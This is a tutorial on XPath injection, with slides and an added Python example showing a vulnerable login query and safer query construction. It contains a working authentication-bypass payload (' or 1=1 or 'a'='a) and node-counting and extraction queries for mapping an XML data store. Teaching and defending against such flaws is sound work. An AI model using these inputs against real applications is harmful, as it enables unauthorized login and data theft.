Injection Attacks: The Complete 2020 Guide

XPATH Injections - Overview

What is XPATH?

XPATH is a language that queries XML documents to locate information, and find elements that match certain patterns or contain certain attributes.

XPATH doesn't provide access controls or user authentication.

If you find an injection vulnerability, you can re-create the structure of the XML document and its data.

When do apps use XML and XPATH?

XML can be used as a database, where we can store a wide variety of data.

XPATH can be used to access that data from your application code.

Illustration (the database analogy):

MySQL -----> XML      (where the data is stored)

SQL   -----> XPATH    (how the application queries it)

users.xml


<?xml version="1.0" encoding="utf-8"?>
<Users>
   <User ID="1">
      <FirstName>Christophe</FirstName>
      <LastName>Limpalair</LastName>
      <UserName>Christophe</UserName>
      <Password>daebcd6d6e32f42790d36807763a8061</Password>
      <Type>Admin</Type>
   </User>
   <User ID="2">
      <FirstName>Eric</FirstName>
      <LastName>G</LastName>
      <UserName>Eric</UserName>
      <Password>1a96179c675fe46550f052e1cf072f50</Password>
      <Type>User</Type>
   </User>
</Users>

XPATH query


FindUser = "//User[UserName/text()='" & Request("Username") & "' and
    Password/text()='" & Request("Password") & "']"

Input supplied by the attacker:

Username: ' or 1=1 or 'a'='a
Password: gfdjkngdfg

The query after the two values are concatenated in:

FindUser = "//User[UserName/text()='' or 1=1 or
    'a'='a' and Password/text()='gfdjkngdfg']"

How XPath groups it (and binds tighter than or, so the predicate is parsed as):

//User[(UserName/text()='' or 1=1) or
    ('a'='a' and Password/text()='gfdjkngdfg')]

The second part of the expression never needs to be evaluated: 1=1 is always true, so the predicate is true for every User node and the query returns all users regardless of the password supplied.
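The flow above, as an added example that is not the slide author's code: it builds the slide's query both the unsafe way (plain concatenation) and with a proper XPath string literal, and shows a login lookup that needs no query string at all. Python's standard-library ElementTree has no full XPath engine, so the injected query is not executed here; the point is what each builder produces for the slide's payload and how the safe lookup behaves with it. The document copy, payload constants and function names are constructed for this example, and XPath operators are written in lowercase (and, or) because the language is case-sensitive. Like the slide's query, the lookup compares the supplied password value with the stored one; the hashing behind those values is left to the application.

```python
import hmac
import xml.etree.ElementTree as ET

# Constructed copy of the users.xml document shown on the slides (same values).
USERS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Users>
   <User ID="1">
      <FirstName>Christophe</FirstName>
      <LastName>Limpalair</LastName>
      <UserName>Christophe</UserName>
      <Password>daebcd6d6e32f42790d36807763a8061</Password>
      <Type>Admin</Type>
   </User>
   <User ID="2">
      <FirstName>Eric</FirstName>
      <LastName>G</LastName>
      <UserName>Eric</UserName>
      <Password>1a96179c675fe46550f052e1cf072f50</Password>
      <Type>User</Type>
   </User>
</Users>
"""

# The payload from the slides, used here only to show what each builder produces.
PAYLOAD_USERNAME = "' or 1=1 or 'a'='a"
PAYLOAD_PASSWORD = "gfdjkngdfg"


def load_users():
    """Parse the constructed document (as bytes, so the encoding declaration is honoured)."""
    return ET.fromstring(USERS_XML.encode("utf-8"))


def build_query_unsafe(username, password):
    """The slide's builder: request values are pasted straight into the XPath text.
    Whatever quotes and operators the caller sends become part of the predicate."""
    return ("//User[UserName/text()='" + username
            + "' and Password/text()='" + password + "']")


def xpath_string_literal(value):
    """Turn an arbitrary Python string into an XPath 1.0 string literal.

    XPath 1.0 has no escape character inside literals. A value with no single
    quote is wrapped in single quotes, one with no double quote in double quotes,
    and one containing both is split on single quotes and rebuilt with concat()
    so that no quote inside the data can terminate the literal."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = value.split("'")
    pieces = []
    for i, part in enumerate(parts):
        if part:
            pieces.append("'" + part + "'")
        if i < len(parts) - 1:
            pieces.append("\"'\"")  # the single quote itself, double-quoted
    return "concat(" + ", ".join(pieces) + ")"


def build_query_safe(username, password):
    """Same query shape, but every request value becomes a proper string literal,
    so the user-supplied text is compared as data rather than parsed as XPath."""
    return ("//User[UserName/text()=" + xpath_string_literal(username)
            + " and Password/text()=" + xpath_string_literal(password) + "]")


def find_user_safe(root, username, password):
    """Avoid a query string altogether: walk the User elements and compare in Python.
    Returns {"ID", "Type"} for a match, or None."""
    for user in root.iter("User"):
        stored_name = user.findtext("UserName") or ""
        stored_pw = user.findtext("Password") or ""
        if stored_name == username and hmac.compare_digest(
                stored_pw.encode("utf-8"), password.encode("utf-8")):
            return {"ID": user.get("ID"), "Type": user.findtext("Type")}
    return None


if __name__ == "__main__":
    root = load_users()
    print("unsafe:", build_query_unsafe(PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("safe:  ", build_query_safe(PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("lookup with payload:", find_user_safe(root, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("lookup with valid credentials:",
          find_user_safe(root, "Christophe", "daebcd6d6e32f42790d36807763a8061"))
```

With the slide's payload, the unsafe builder yields exactly the predicate shown above, while the safe builder wraps the username in double quotes so the single quotes inside it stay data. The concat() form matters because XPath literals cannot escape quotes, so a value holding both kinds cannot be expressed as a single literal.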



<?xml version="1.0" encoding="utf-8"?>
<Products>
   <Product ID="163">
      <ProductName>Cool Product</ProductName>
      <ProductDescription>These are details for this cool product</ProductDescription>
      <ProductPrice>$199</ProductPrice>
      <QuantityAvailable>45</QuantityAvailable>
      <ReleaseDate>2020</ReleaseDate>
   </Product>
   <Product ID="259">
      <ProductName>Cool Product v2</ProductName>
      <ProductDescription>These are details for this cool product v2</ProductDescription>
      <ProductPrice>$299</ProductPrice>
      <QuantityAvailable>10</QuantityAvailable>
      <ReleaseDate>2023</ReleaseDate>
   </Product>
</Products>


count(/Products/child::node())

Count the number of products


//Product[position()=1]

Extract specific nodes

Grab the first product in the XML document (indexes start at 1)


(//Product[position()=2]/child::node()[position()=3])

Extract the ProductPrice

Grab the 2nd product, and the 3rd node of that 2nd product



This assumes that...

  • You know the element names (Product)
  • You know which position the ProductPrice node is in (3)
  • You know what the structure of the XML document is

Overview of XPATH injections

By Christophe Limpalair
